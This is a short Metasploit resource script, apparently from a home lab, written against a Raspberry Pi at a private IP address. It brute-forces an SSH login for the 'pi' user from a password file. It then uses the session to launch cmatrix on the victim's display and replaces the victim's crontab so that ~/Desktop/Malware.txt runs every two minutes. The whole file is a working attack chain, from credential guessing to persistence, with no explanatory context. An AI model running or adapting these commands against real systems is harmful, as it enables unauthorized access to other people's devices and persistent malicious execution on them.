use auxiliary/scanner/ssh/ssh_login 
set USERNAME pi
set PASS_FILE /home/kali/Desktop/infopass.txt
set RHOSTS 192.168.1.232
set VERBOSE true
set STOP_ON_SUCCESS true
run
sessions -c "export DISPLAY=:10.0;lxterminal -e "cmatrix"" -i 1
sessions -c "crontab -l > mycron;echo '*/2 * * * * bash ~/Desktop/Malware.txt' > mycron;crontab mycron;rm mycron"
quit -y
